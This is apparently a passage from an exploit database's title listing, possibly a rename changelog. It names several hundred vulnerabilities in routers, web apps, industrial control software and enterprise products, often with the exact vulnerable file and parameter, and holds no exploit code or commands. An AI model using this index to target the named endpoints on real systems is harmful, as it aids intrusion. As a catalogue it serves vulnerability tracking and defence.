ProSafe Wireless Router - Rule Bypass NETGEAR FM114P ProSafe Wireless Router - Rule Bypass M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting Microsoft Internet Explorer 6 -' %USERPROFILE%' File Execution Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution EZMeeting 3.x - EZNet.exe Long HTTP Request Remote Buffer Overflow EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow 
Enterasys NetSight - nssyslogd.exe Buffer Overflow (Metasploit) IBM Cognos - tm1admsd.exe Overflow (Metasploit) Enterasys NetSight - 'nssyslogd.exe' Buffer Overflow (Metasploit) IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit) Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting Microsoft Windows XP/2000/2003 -'winhlp32' Phrase Integer Overflow Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow Oracle 8.x/9.x/10.x - Database Multiple SQL Injection Oracle 8.x/9.x/10.x Database - Multiple SQL Injections SAP Business Connector 4.6/4.7 - chopSAPLog.dsp fullName Variable Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - deleteSingle fullName Variable Arbitrary File Deletion SAP Business Connector 4.6/4.7 - adapter-index.dsp url Variable Arbitrary Site Redirect SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue Cruiseworks 1.09 - Cws.exe Doc Directory Traversal Cruiseworks 1.09 - Cws.exe Doc Buffer Overflow Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzypic.php' 'd' Parameter Traversal Arbitrary Directory Listing LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow LANDesk Management Suite 8.7 Alert Service - 'AOLSRVR.exe' Buffer Overflow Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow ABB MicroSCADA - wserver.exe Remote Code Execution 
(Metasploit) ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit) SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities Cisco User-Changeable Password (UCP) 3.3.4.12.5 - CSUserCGI.exe Help Facility Cross-Site Scripting Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe' Action Parameter Traversal Arbitrary File Access F5 FirePass 6.0.2.3 - /vdesk/admincon/webyfiers.php css_exceptions Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution (Metasploit) GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit) SolidWorks Workgroup PDM 2014 - pdmwService.exe Arbitrary File Write (Metasploit) SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit) Yokogawa CENTUM CS 3000 - BKHOdeq.exe Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Buffer Overflow (Metasploit) Apache Geronimo 2.1.x - /console/portal/Server/Monitoring Multiple Parameter Cross-Site Scripting Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Parameter Cross-Site Scripting Comtrend CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web 
Interface - /diagnose Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /configuration Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /scripter.php Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/scripter.php' Multiple Parameter Cross-Site Scripting Yokogawa CS3000 - BKESimmgr.exe Buffer Overflow (Metasploit) Yokogawa CS3000 - 'BKESimmgr.exe' Buffer Overflow (Metasploit) Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit) Yokogawa CS3000 - 'BKFSim_vhfd.exe' Buffer Overflow (Metasploit) U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection U.S.Robotics USR5463 0.06 Firmware - 'setup_ddns.exe' HTML Injection WhatsApp 2.11.476 - Remote Reboot/Crash App Android Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu.maf jdeowpBackButtonProtect Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_Menu.mafService e1.namespace Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_OCL.mafService e1.namespace Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/MafletClose.mafService RENDER_MAFLET Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter Cross-Site Scripting WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service) Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site 
Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting Linksys WRT54GL (Wireless Router) - Cross-Site Request Forgery Linksys WRT54GL Wireless Router - Cross-Site Request Forgery Cisco Linksys E4200 - /apply.cgi Multiple Parameter Cross-Site Scripting Cisco Linksys E4200 - '/apply.cgi' Multiple Parameter Cross-Site Scripting Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution Comtrend CT-5361T Router - Password.cgi Cross-Site Request Forgery (Admin Password Manipulation) COMTREND CT-5361T Router - 'Password.cgi' Cross-Site Request Forgery (Admin Password Manipulation) Alfresco - /proxy endpoint Parameter Server-Side Request Forgery Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery PhpTagCool 1.0.3 - SQL Injection Attacks Exploit PhpTagCool 1.0.3 - SQL Injection phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2) phpBB 2.0.18 - Remote Brute Force/Dictionary (2) Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Yrch 1.0 - 'plug.inc.php path Variable' Remote File Inclusion Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion Vizayn Haber - 
'haberdetay.asp id Variable' SQL Injection Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection iG Calendar 1.0 - 'user.php id Variable' SQL Injection iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection MGB 0.5.4.5 - 'email.php id Variable' SQL Injection MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection Alstrasoft e-Friends 4.98 - (seid) Multiple SQL Injection Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections MyPHP Forum 3.0 - (Final) Multiple SQL Injection MyPHP Forum 3.0 (Final) - Multiple SQL Injections File Store PRO 3.2 - Multiple Blind SQL Injection File Store PRO 3.2 - Multiple Blind SQL Injections AssetMan 2.5-b - SQL Injection using Session Fixation Attack AssetMan 2.5-b - SQL Injection using Session Fixation Kasra CMS - 'index.php' Multiple SQL Injection Kasra CMS - 'index.php' Multiple SQL Injections NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injection NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections T-HTB Manager 0.5 - Multiple Blind SQL Injection T-HTB Manager 0.5 - Multiple Blind SQL Injections Joomla! Component com_oziogallery2 - / IMAGIN Arbitrary file write Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write Open Bulletin Board - Multiple Blind SQL Injection Open Bulletin Board - Multiple Blind SQL Injections AJ Matrix 3.1 - 'id' Multiple SQL Injection AJ Matrix 3.1 - 'id' Multiple SQL Injections Zylone IT - Multiple Blind SQL Injection Zylone IT - Multiple Blind SQL Injections WhiteBoard 0.1.30 - Multiple Blind SQL Injection WhiteBoard 0.1.30 - Multiple Blind SQL Injections AV Arcade 3 - Cookie SQL Injection Authentication Bypass AV Arcade 3 - Cookie SQL Injection / Authentication Bypass Joomla! Component Teams - Multiple Blind SQL Injection Joomla! Component Teams - Multiple Blind SQL Injections AneCMS - /registre/next SQL Injection AneCMS - '/registre/next' SQL Injection Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection Joomla! 
Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injections Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections ColdOfficeView 2.04 - Multiple Blind SQL Injection ColdOfficeView 2.04 - Multiple Blind SQL Injections Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injection Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections Projekt Shop - 'details.php' Multiple SQL Injection Projekt Shop - 'details.php' Multiple SQL Injections PixelPost 1.7.3 - Multiple POST Variables SQL Injection PixelPost 1.7.3 - Multiple POST Parameter SQL Injections Webcat - Multiple Blind SQL Injection Webcat - Multiple Blind SQL Injections LiteRadius 3.2 - Multiple Blind SQL Injection LiteRadius 3.2 - Multiple Blind SQL Injections PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injections Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit COMTREND CT-5624 Router - Root/Support Password Disclosure/Change Exploit Sagem F@ST 2604 (ADSL Router) - Cross-Site Request Forgery Sagem F@ST 2604 ADSL Router - Cross-Site Request Forgery Rivettracker 1.03 - Multiple SQL Injection Rivettracker 1.03 - Multiple SQL Injections ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injections PHP Ticket System Beta 1 - 'index.php p Parameter' SQL Injection PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection X-Cart Gold 4.5 - 'products_map.php symb Parameter' Cross-Site Scripting X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting Symantec Web Gateway 5.0.2 - 'blocked.php id Parameter' Blind SQL Injection Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 
'deptUploads_data.php groupid Parameter' Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injections YourArcadeScript 2.4 - 'index.php id Parameter' SQL Injection YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection QNAP Turbo NAS TS-1279U-RP - Multiple Path Injection QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections Blog Mod 0.1.9 - 'index.php month Parameter' SQL Injection Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection Authoria HR Suite - AthCGI.exe Cross-Site Scripting Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion friendsinwar FAQ Manager - SQL Injection (Authentication Bypass) friendsinwar FAQ Manager - SQL Injection / Authentication Bypass friendsinwar FAQ Manager - 'view_faq.php question Parameter' SQL Injection friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection SmartCMS - 'index.php idx Parameter' SQL Injection SmartCMS - 'index.php' 'idx' Parameter SQL Injection SmartCMS - 'index.php menuitem Parameter' SQL Injection / Cross-Site Scripting SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection Mambo Open Source 4.0.14 - 
'PollBooth.php' Multiple SQL Injections MyBB AwayList Plugin - 'index.php id Parameter' SQL Injection MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection PHP-Nuke Error Manager Module 2.1 - error.php language Variable Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - error.php Multiple Variables Cross-Site Scripting PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Parameters Cross-Site Scripting phpHeaven phpMyChat 0.14.5 - edituser.php3 do_not_login Variable Authentication Bypass phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection Gattaca Server 2003 - Language Variable Path Exposure Gattaca Server 2003 - 'Language' Parameter Path Exposure AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injection AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injections Scripts Genie Gallery Personals - 'gallery.php L Parameter' SQL Injection Scripts Genie Gallery Personals - 'gallery.php' 'L' Parameter SQL Injection AdaptCMS 2.0.4 - 'config.php question Parameter' SQL Injection AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection Scripts Genie Domain Trader - 'catalog.php id Parameter' SQL Injection Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection Scripts Genie Top Sites - 'out.php id Parameter' SQL Injection Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid Parameter' SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id 
Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection MTP Image Gallery 1.0 - 'edit_photos.php title Parameter' Cross-Site Scripting MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting D-Link DSL-2740B (ADSL Router) - Authentication Bypass D-Link DSL-2740B ADSL Router - Authentication Bypass TIPS MailPost 5.1.1 - APPEND Variable Cross-Site Scripting TIPS MailPost 5.1.1 - 'APPEND' Parameter Cross-Site Scripting DUclassified 4.x - adDetail.asp Multiple Parameter SQL Injection DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections Rebus:list - 'list.php list_id Parameter' SQL Injection Rebus:list - 'list.php' 'list_id' Parameter SQL Injection SynConnect Pms - 'index.php loginid Parameter' SQL Injection SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection AWS Xms 2.5 - 'importer.php what Parameter' Directory Traversal Pollen CMS 0.6 - 'index.php p Parameter' Local File Disclosure AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal Pollen CMS 0.6 - 'index.php' 'p' Parameter Local File Disclosure WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash Parameter' SQL Injection WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash' Parameter SQL Injection Kayako eSupport 2.x - Ticket System Multiple SQL Injection Kayako eSupport 2.x - Ticket System Multiple SQL Injections BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection BibORB 1.3.2 Login Module - Multiple Parameter SQL Injections Active Auction House - default.asp Multiple SQL Injection Active Auction House - 'default.asp' Multiple SQL Injections CubeCart 2.0.x - 'index.php' Multiple Variable Full Path Disclosure CubeCart 2.0.x - tellafriend.php product Variable Full Path Disclosure CubeCart 2.0.x - view_cart.php add Variable Full Path Disclosure CubeCart 2.0.x - view_product.php product Variable Full Path Disclosure CubeCart 2.0.x - 'index.php' Multiple Parameter Full Path 
Disclosure CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure OneWorldStore - 'OWListProduct.asp' Multiple SQL Injection OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections WHMCS 4.x - 'invoicefunctions.php id Parameter' SQL Injection WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - 'default.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - inc_vote.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - result.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - cat.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - detail.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - 'inc_vote.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'result.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'cat.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'detail.asp' Multiple Parameter SQL Injections DUportal 3.1.2 - inc_rating.asp Multiple Parameter SQL Injection DUportal 3.1.2 - 'inc_rating.asp' Multiple Parameter SQL Injections StorePortal 2.63 - default.asp Multiple SQL Injection StorePortal 2.63 - 'default.asp' Multiple SQL Injections MetaCart2 - SearchAction.asp Multiple SQL Injection MetaCart2 - 'SearchAction.asp' Multiple SQL Injections Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple Parameter SQL Injections JGS-Portal 3.0.1 - ID Variable SQL Injection JGS-Portal 3.0.1 - 'ID' Parameter SQL Injection AVE.CMS 2.09 - 'index.php module Parameter' Blind SQL Injection AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection RadioCMS 2.2 - 'menager.php playlist_id Parameter' SQL Injection RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection NPDS 4.8 - 
/5.0 modules.php Lettre Parameter Cross-Site Scripting NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting Ampache 3.4.3 - 'login.php' Multiple SQL Injection Ampache 3.4.3 - 'login.php' Multiple SQL Injections FlatNuke 2.5.x - 'index.php' where Variable Full Path Disclosure FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - 'memory.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'line.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'in.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'enter.php' Multiple Parameter SQL Injections osTicket 1.2/1.3 - view.php inc Variable Arbitrary Local File Inclusion osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion Ruubikcms 1.1.1 - 'tinybrowser.php folder Parameter' Directory Traversal Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal Simple PHP Agenda 2.2.8 - 'edit_event.php eventid Parameter' SQL Injection Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection PHPFreeNews 1.40 - searchresults.php Multiple SQL Injection PHPFreeNews 1.40 - searchresults.php Multiple SQL Injections Aenovo - /Password/default.asp Password Field SQL Injection Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection Aenovo - '/Password/default.asp' Password Field SQL Injection Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - 
/admincp/user.php Multiple Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertitle.php usertitleid Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertools.php ids Parameter SQL Injection NooToplist 1.0 - 'index.php' Multiple SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/css.php group Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/index.php Multiple Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php email Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/language.php goto Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter Cross-Site Scripting MX Shop 3.2 - 'index.php' Multiple SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection NooToplist 1.0 - 'index.php' Multiple SQL Injections vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Parameter Cross-Site Scripting MX Shop 3.2 - 'index.php' Multiple SQL Injections Top Games Script 1.2 - 'play.php gid Parameter' SQL Injection Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection Elemata CMS RC3.0 - 'global.php id Parameter' SQL Injection Elemata CMS RC3.0 - 'global.php' 
'id' Parameter SQL Injection Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections OaBoard 1.0 - forum.php Multiple SQL Injection OaBoard 1.0 - 'forum.php' Multiple SQL Injections Comersus Backoffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure PHP-Charts 1.0 - 'index.php type Parameter' Remote Code Execution PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting Walla TeleSite 3.0 - ts.exe tsurl Variable Arbitrary Article Access Walla TeleSite 3.0 - ts.exe sug Parameter Cross-Site Scripting Walla TeleSite 3.0 - ts.exe sug Parameter SQL Injection Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection Pearl Forums 2.0 - 'index.php' Multiple SQL Injection Pearl Forums 2.0 - 'index.php' Multiple SQL Injections Helpdesk Issue 
Manager 0.x - find.php Multiple Parameter SQL Injection Helpdesk Issue Manager 0.x - 'find.php' Multiple Parameter SQL Injection PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injection Cars Portal 1.1 - 'index.php' Multiple SQL Injection PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections Cars Portal 1.1 - 'index.php' Multiple SQL Injections IceWarp Universal WebMail - /accounts/inc/include.php Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - /admin/inc/include.php Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - /dir/include.html lang Parameter Local File Inclusion IceWarp Universal WebMail - /mail/settings.html Language Parameter Local File Inclusion IceWarp Universal WebMail - /mail/index.html lang_settings Parameter Remote File Inclusion IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access PHPJournaler 1.0 - Readold Variable SQL Injection PHPJournaler 1.0 - 'Readold' Parameter SQL Injection ScozNet ScozBook 1.1 - AdminName Variable SQL Injection ScozNet ScozBook 1.1 - 'AdminName' Parameter SQL Injection OnePlug CMS - /press/details.asp Press_Release_ID Parameter SQL Injection OnePlug CMS - /services/details.asp Service_ID Parameter SQL Injection OnePlug CMS - /products/details.asp Product_ID Parameter SQL Injection OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection OnePlug CMS - 
